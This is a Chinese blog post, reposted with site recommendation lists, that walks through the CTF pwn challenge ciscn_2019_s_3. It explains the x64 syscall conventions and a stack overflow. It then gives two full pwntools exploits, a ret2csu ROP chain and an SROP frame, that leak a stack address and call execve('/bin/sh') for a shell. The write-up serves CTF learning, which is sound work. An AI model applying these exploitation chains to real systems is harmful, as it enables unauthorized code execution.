显示recv调用次数_ctf中关于syscall系统调用的简单分析

最新推荐文章于 2024-02-19 00:00:00 发布
最新推荐文章于 2024-02-19 00:00:00 发布
阅读量216 收藏
点赞数
文章标签: 显示recv调用次数

原创 紫色仰望 合天智汇

0x01

我在动态调试这个程序的时候,发现 syscall调用 系统函数 的过程很有趣,于是便记录下来 希望对大家 能带来些帮助,这里 以 buu 平台上的 ciscn_2019_s_3 为例,给大家详细地分享以及分析下!

0x02

在开始之前,我们先来认真 学习下 read(),write()的 原型:

read():  ssize_t read(int fd,const void *buf,size_t nbytes);   //fd 为要读取的文件的描述符  0  //buf 为要读取的数据的缓冲区地址   //nbytes 为要读取的数据的字节数  //read() 函数会从 fd 文件中读取 nbytes 个字节并保存到缓冲区 buf, //成功则返回读取到的字节数(但遇到文件结尾则返回0),失败则返回 -1。write()   ssize_t write(int fd,const void *buf,size_t nbytes);  //fd 为要写入的文件的描述符  1   //buf 为要写入的数据的缓冲区地址  //nbytes 为要写入的数据的字节数  //write() 函数会将缓冲区 buf 中的 nbytes 个字节写入文件 fd, //成功则返回写入的字节数,失败则返回 -1。

0x03

然后我们再来简单了解下 syscall !嗯...我们来看下维基百科的介绍吧,

41ee46cfce3771f26caa7f7ba86d5b9a.png

上面的是 32 位的系统调用,而64位系统的系统调用总体思想还是一样的,当然也会有些不同,

32位与64位 系统调用的区别:

1. 传参方式不同

2. 系统调用号 不同

3. 调用方式 不同

32位:

传参方式:首先将系统调用号 传入 eax,然后将参数 从左到右 依次存入 ebx,ecx,edx寄存器中,返回值存在eax寄存器

调用号:sys_read 的调用号 为 3 sys_write 的调用号 为 4

调用方式: 使用 int 80h 中断进行系统调用

64位:

传参方式:首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器

调用号:sys_read 的调用号 为 0 sys_write 的调用号 为 1

stub_execve 的调用号 为 59 stub_rt_sigreturn 的调用号 为 15

调用方式: 使用 syscall 进行系统调用

Ok,知道了上面这些知识,那么做这题,其实相对来说 会容易些了!可能本来大佬们就没觉得难,还求勿喷!基于网上 对这题的题解很少,我调试了很长时间才弄懂!实在是太弱了!

点击“http://www.hetianlab.com/cour.do?w=1&c=CCIDc0ec-6fda-4403-bd39-82c0f3a70c9b”开始实操练习!

0x04

首先检查文件属性和文件开启的保护有哪些:

$file ciscn_s_3ciscn_s_3:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked,interpreter /lib64/l, for GNU/Linux 2.6.32, BuildID[sha1]=af580816080db5e4d1d93a271087adaee29028e8, not stripped  checksec ciscn_s_3  Arch:     amd64-64-little RELRO:    Partial RELRO Stack:    No canary found NX:       NX enabled PIE:      No PIE (0x400000)

64位elf 文件 只开启 NX 保护

拖入ida 查看main函数:

int __cdecl main(int argc, const char **argv, const char **envp){    return vuln();}进去 vuln()函数:signed __int64 vuln(){   signed __int64 result; // rax     __asm { syscall; LINUX - sys_read }    result = 1LL;    __asm { syscall; LINUX - sys_write }   return result;}

嗯。。。我们看汇编代码!

132b57de9d6ca02f7d6dfc7df9f83180.png

这里可以看到 汇编指令 的含义

-----------------------------------------------------

将read的系统调用号 0 赋值给 rax

将 read的第一个参数0 (fd) 赋值给了 rdi

将 read的第二个参数 buf 赋值给了 rsi

将 read的第二个参数 buf 赋值给了 rdx

即系统调用了 read(0,&buf,0x400)

同理 紧接着 又调用了 write(1,&buf,0x30)

其中 buf 距离 rbp 0x10个字节,存在栈溢出漏洞!

7024eee0631d14c4ecbfbd921f2849a2.png

然后经过调试 我还发现当执行了 syscall这个汇编命令(即调用对应系统函数)后,

在gdb上可以很清楚的 看到 其实执行完后 对寄存器的影响

仅仅发生改变的是RAX,与RCX

其中 RAX 会存着 对应系统函数 调用后返回的结果

RCX 会存着当 syscall指令的下一条指令地址

这里放个对比图,可以看的更明白些!

syscall指令 执行前:

4e33ac9e559549ced42897f58ac72926.png

syscall指令执行后:

f4c058d3d990fbcf09def87bfc82beba.png

当然,知道这些对于我们来说已经足够了!

我们继续来分析下 vuln函数 ,具体看下图中注释

cade9404bcad169496d7cb885da43deb.png

这个题rsp和rbp一直在重合,直接ret,就相当于pop rip,

所以覆盖rbp就可以劫持了程序执行流。

所以 这题 在最后 ret的 时候其实 就是 返回 到了rbp处 的地址了。这点很重要。

-----------------------------------------------

另外程序中还有个gadgets 函数

3667791d64750fad1f2ed10f5e3be31e.png

我们可以 发现这个函数里面有两个可以 gadget 即 控制 rax的 带有 ret 的汇编指令片段

mov rax,0Fh    //   0Fh  即15    而15 对应的是 sys_rt_sigreturn系统调用mov rax,3Bh     //  3Bh  即 59    而15 对应的是  sys_execve 系统调用

对于 以上两个系统调用,我们可以有两种 解题方法

第一种:利用 ret2__libc_csu_init 去构造 execve("/bin/sh",0,0) 来 getshell第二种:直接srop 伪造 sigreturn frame 去 构造 execve("/bin/sh",0,0) 来 getshell

我们重点 就看第一种 了:

因为是系统调用嘛,

所以我们要想 构造 execve("/bin/sh",0,0) 需要 

将  sys_execve 的调用号 59 赋值给 rax将    第一个参数即字符串 "/bin/sh"的地址 赋值给 rdi将    第二个参数 0  赋值给 rsi将    第三个参数 0  赋值给 rdx

但我们发现 我们没有 足够gadget 可以利用,于是我们想到了

“x64 下的 __libc_csu_init 中的 gadgets,这个函数是用来对 libc 进行初始化操作的,而一般的程序都会调用 libc 函数,所以这个函数一定会存在“

用下面这个命令去 找到它的位置,

ROPgadget --binary ciscn_s_3 --only 'pop|ret'
bb49d8db71d7f58f76b3416fe152f9d0.png

这里需要注意 Ropgadget 有时总会 有一点显示的不完整,我们通过它在ida中再去看下,

loc_400580和loc_400596 就是上面说的 __libc_csu_init gadget了。

0e15bfa59e53dc2b0652713f9dd2567d.png

0x05

我们最终写下如下 exp:

#coding:utf8from pwn import *context.log_level = 'debug'conn=process("./ciscn_s_3")vuln_addr=0x4004EDmov_rax_execv_addr=0x4004E2   #ida中查看pop_rdi_ret_addr=0x4005a3  #ROPgadget --binary ciscn_s_3 --only 'pop|ret'pop_rbx_rbp_r12_r13_r14_r15_ret_addr=0x40059A__libc_csu_init_addr=0x400580  # __libc_csu_init gadget 首地址syscall_addr=0x400501             #ida中查看#gdb.attach(conn,'b *0x40052C')payload1='/bin/shx00'*2+p64(vuln_addr)conn.send(payload1)conn.recv(0x20                  )bin_sh_addr=u64(conn.recv(8))-280print hex(bin_sh_addr)   #解答  1payload2='/bin/shx00'*2+p64(pop_rbx_rbp_r12_r13_r14_r15_ret_addr)+p64(0)*2+p64(bin_sh_addr+0x50)+p64(0)*3payload2+=p64(__libc_csu_init_addr)+p64(mov_rax_execv_addr)payload2+=p64(pop_rdi_ret_addr)+p64(bin_sh_addr)+p64(syscall_addr) #解答  2conn.send(payload2)conn.interactive()

0x06

我们照着 exp 来分析下 :

解答1:

因为最后我们构造payload的时候需要用到 /bin/sh 的地址,程序中又没有,我们这里选择自己输入,但是我们输入到了 栈上,为了后面可以使用该 地址,我们需要首先将 /bin/sh 所在栈地址 泄露出来!

我们gdb调试,可以得知 在write输出的 0x20字节后 的 0x00007fffffffde08 是栈 上的地址 我们用它 减去 buf 所在栈上地址 即可得到 /bin/sh所在栈上地址 0x00007fffffffde08-0x7fffffffdcf0=280

反之 bin_sh_addr=0x00007fffffffde08-280

c6a5d2b883b45cef1546d9c1f8032eba.png

解答二 :

为什么要这样构造 payload2?

payload2='/bin/shx00'*2+p64(pop_rbx_rbp_r12_r13_r14_r15_ret_addr)+p64(0)*2+p64(bin_sh_addr+0x50)+p64(0)*3payload2+=p64(__libc_csu_init_addr)+p64(mov_rax_execv_addr)payload2+=p64(pop_rdi_ret_addr)+p64(bin_sh_addr)+p64(syscall_addr)

看这个payload的第一行:

因为文章上面我已经分析过了

******************************************************************************************

这个题rsp和rbp一直在重合,直接ret,就相当于pop rip,

所以覆盖rbp就可以劫持了程序执行流。

所以 这题 在最后 ret的 时候其实 就是 返回 到了rbp处 的地址了。于是 p64(pop_rbx_rbp_r12_r13_r14_r15_ret_addr) 其实就相当于是在ret_addr处,

**************************************************************************

b28079bd111938947a9647c74dbfdf22.png

看图,动态来具体了解下 这个payload是怎么运转的我们跟进去

bded0fa2750efc5d113b75344461d1c4.png

继续 n 我们会返回到 __libc_csu_init_addr 0x400580

8644f1b6c33f3c458980fd41f727c644.png

如图:将execve 的系统调用号 0x 3b 赋值给 rax

d058af427b054f33911756cec02df553.png

执行完后会 ret 回到 add rbx,0x1

这里是很关键的一步,

原本 rbp=rbx=0,然而 rbx在这 加了 1 与 rbp就不再相等 于是 会跳转到0x400580执行

b744cc23d3431fb6618a2fcd3224afb3.png 
call QWORD PTR [r12+rbx*8]    便会 调用了  红框之后的  pop_rdi_ret_addr 处的函gadget了
d8932c9022f3cba06ee66be10ca0a659.png

然后接着就是 把 bin_sh_addr 赋值给了 rdi了

这样 execve("/bin/sh",0,0)就构造成功了,最后再执行syscall_addr便成功调用该函数 于是getshell 。

74028d83d17e3d92915767fd73fc995f.png

这里如果 还理解不了的话 可以在ctf_wiki学习下栈溢出之 medium_rop

https://wiki.x10sec.org/pwn/stackoverflow/medium_rop/

0x07

第二种:直接srop 伪造 sigreturn frame 去 伪造 execve("/bin/sh",0,0) 来 getshell

具体就是 首先利用 mov rax, 0Fh 控制rax为 15,然后 调用 syscall 即执行了 sigreturn,我们 伪造 sigreturn frame 去 执行 execve("/bin/sh",0,0) 即可

#coding:utf8from pwn import *context(arch='amd64', os='linux', log_level = 'DEBUG')#这个注意 一定要说明 内核架构  不然报错#context.log_level = 'debug'conn=process("./ciscn_s_3")conn=remote('node3.buuoj.cn',26536)vuln_addr=0x4004EDmov_rax_sigreturn_addr=0x4004DAsyscall_addr=0x400501#gdb.attach(conn,'b *0x40052C')payload1='/bin/shx00'*2+p64(vuln_addr)conn.send(payload1)conn.recv(0x20)bin_sh_addr=u64(conn.recv(8))-280print hex(bin_sh_addr)         frame = SigreturnFrame()frame.rax = constants.SYS_execveframe.rdi = bin_sh_addrframe.rsi = 0frame.rdx = 0#frame.rsp = bin_sh_addrframe.rip = syscall_addrpayload2='/bin/shx00'*2+p64(mov_rax_sigreturn_addr)+p64(syscall_addr)+str(frame)conn.send(payload2)conn.interactive()


最后要注意的一点就是 写 exp 时一定要 说明 内核架构 不然报错!

context(arch='amd64', os='linux', log_level = 'DEBUG')#这个注意一定要说明内核架构 ,不然报错。

声明:笔者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关!

weixin_39820136
关注
syscall指令_linux系统调用-SYSCALL_DEFINEx详解
weixin_36060333的博客
12-28 1024
系统调用在内核的入口都是sys_xxx,但其实Linux的系统调用都改为SYSCALL_DEFINE定义的。本文以socket系统调用为例来详解。1 首先看一下SYSCALL_DEFINE的定义,如下:1 #define SYSCALL_DEFINE0(name) asmlinkage long sys_##name(void)2 #define SYSCALL_DEFINE1(na...
syscall指令_MIPS汇编语言SYSCALL指令的用法
weixin_35830270的博客
12-28 1802
SYSCALL functions available in MARSIntroductionA number of system services, mainly for input and output, are available for use by your MIPS program. They are described in the table below.MIPS register...
尚硅谷2020最新版宋红康JVM教程-篇-第2章Class文件结构-1-概述
admin741admin的博客
09-28 372
引言 Java字节码对于虚拟机,就好像汇编语言对于计算机,属于基本执行指令。 Java虚拟机的指令由一个字节长度的、代表着某种特定操作含义的数字(称为操作码,Opcode)以及跟随其后的零至多个代表此操作所需参数(称为操作数,Operands)而构成。由于Java虚拟机采用面向操作数栈而不是寄存器的结构,所以大多数的指令都不包含操作数,只有一个操作码。 由于限制了Java虚拟机操作码的长度为一个字节(即0~255),这意味着指令集的操作码总数不可能超过256条。 官方文档:https://docs.ora
syscall指令_linux汇编:如何调用syscall?
weixin_36468140的博客
12-28 1679
要在64位Linux进行系统调用,请将系统调用号放在rax,然后将其参数按顺序放在rdi,rsi,rdx,r10,r8和r9,然后调用syscall.这是一个例子.global _start.text_start:# write(1, message, 13)mov $1, %rax # system call 1 is writemov $1,...
系统调用syscall函数和字符设备驱动file_operations
xcxhzjl的博客
01-06 1689
Linux系统调用syscall函数
syscall指令_ctf关于syscall系统调用简单分析
weixin_36190812的博客
12-28 377
原创 紫色仰望 合天智汇0x01我在动态调试这个程序的时候,发现 syscall调用 系统函数 的过程很有趣,于是便记录下来 希望对大家 能带来些帮助,这里 以 buu 平台上的 ciscn_2019_s_3 为例,给大家详细地分享以及分析下!0x02在开始之前,我们先来认真 学习下 read(),write()的 原型:read():ssize_t read(int fd,const void...
ret2syscall
m0_49959202的博客
09-18 298
文章目录ret2syscall1.原理2.构造过程3.exp ret2syscall ret2syscall: 控制程序执行系统调用,获取 shell 1.原理 系统调用参考博客:https://blog.csdn.net/qq_33948522/article/details/93880812 2.构造过程 使用ida分析程序,发现存在gets()函数,可以用来进行栈溢出: 使用shift+F12查看字符串,发现存在"/bin/sh"字符串,位于0x080BE408处: 基于rop链构造思路,需
从零开始学逆向:理解ret2syscall
最新发布
weixin_44626085的博客
02-19 1316
链接:https://pan.baidu.com/s/19ymHlZZmVGsJHFmmlwww0w 提取码:r4el 首先checksec 看一下保护机制ret2syscall 即控制程序执行系统调用来获取 shell 什么是系统调用?​ 3.1 使用ida打开分析 ​gets函数存在明显的栈溢出,但是这次没有后门函数,NX防护也打开了,那么就要换一种套路了,通过系统调用拿到shell 我们需要控制eax,ebx,ecx,edx的值,可以使用ROPgadget这个工具帮我们找到所需的代码片段。
PWN学习,对CTF-wiki上的讲解进行一些补充
qq_33948522的博客
06-27 5660
`基本知识 ROP Return Oriented Programming,其主要思想是在栈缓冲区溢出的基础上,利用程序已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 一般的栈结构: 高地址 +-----------------+ ...
“百度杯”CTF比赛 十二月场easypwn
红凳子的博客
04-04 664
“百度杯”CTF比赛 十二月场easypwn前言一、程序分析二、漏洞利用exploit 前言 在这篇文章将学习到泄露canary、ret2scu和ret2syscall 一、程序分析可以看出该程序为64位动态链接的ELF文件,开启了canary保护,需要想办法绕过。 绕过canary的方法分为两种,一种为直接泄露canary的值,另一种为覆盖canary的值。 这里选择泄露canary的值,可以看出canary的位置在[rbp-8h]处,接着想办法泄露出[rbp-8h]处数据。 从源码可以
SyscallTables-master(syscall hook源码)
01-08
这是看雪论坛转载过来的,方便大家下载,实测可用而且很好用
修改MSR对syscall指令HOOK
12-12
修改MSR(lstar)对syscall指令HOOK. 本身在win7 x64 sp1使用VS2013开发。
Linux系统64位AT&T系统调用汇编指令syscall
qq_42108074的博客
10-24 1272
在Linuxsyscall是系统调用)的指令。想要深入了解syscall的作用,就需要了解特权级别。现代计算机通常采用名为的机制来保护整个系统的数据和功能,使其免受故障和外部恶意行为的伤害。这种方式通过提供多种不同层次的资源访问级别,即特权级别,来限制不同代码的执行能力。Intel x86 架构,特权级别被分为 4 个层次,即Ring0Ring3。其,Ring0层拥有最高特权,它具有对整个系统的最大控制能力,内核代码通常运行于此。相对地,Ring3。
【Linux】syscall系统调用原理及实现
热门推荐
楠燊.tech
02-22 1万+
linux syscall系统调用
3分钟了解syscall系统调用|详细易懂的流程
weixin_43356770的博客
01-04 3816
系统调用syscall)是操作系统提供给程序以请求内核服务的一种机制。和int 0x80提供相同的服务。系统调用是操作系统提供给应用程序的一种重要接口,它使得程序能够安全、有效地执行需要操作系统干预的操作,如文件处理、进程管理等。尽管系统调用引入了一定的性能开销,但它的安全性和易用性使得它成为操作系统设计不可或缺的一部分。SYSCALL减少了上下文切换和简化了指令执行流程,性能更高,但对旧机器的兼容性不如int 80h.
syscall()
m0_51551385的博客
06-03 3850
syscall函数
syscall指令_使用 syscall/sysret 指令
weixin_39619478的博客
12-28 668
void sysret(){if (EFER.SCE == 0) /* System Call Extension is disable */do_exception_UD();if (CR0.PE == 0 || CS.attribute.DPL != 0) /* protected mode is disable or CPL != 0 */do_exception_GP(...
曹春晖:谈一谈 Go 和 Syscall
cmqsbon24073的博客
04-22 920
桔妹导读:syscall 是语言与系统交互的唯一手段,理解 Go 语言syscall,本文可以帮助读者理解 Go 语言怎么与系统打交道,同时了解底层 runtime 在 syscall 优化方面的一些小心思,从而更为深入地...
汇编笔记:syscall和int 80H
无香花自开
10-10 3427
;nasm -f elf64 -g -F stabs testhello.s ;ld -o hello testhello.o section .data msg: db "hello world!", 10 ; ascii表10对应换行符 msglen: equ $-msg section .bss section .text global _start _start: Nop ;i386通过断(int 0x80)来实现系统调用 ;寄存器 eax 存放系统调用号,同时返回值也存.
Linux系统调用入门:定义、原理与实践
"这篇教程是关于Linux系统调用的学习指南,旨在帮助读者深入理解系统调用的概念、原理和使用方法。Linux系统调用是内核提供的子程序集合,用于执行各种系统级任务。它们与普通函数调用的主要区别在于运行环境,系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值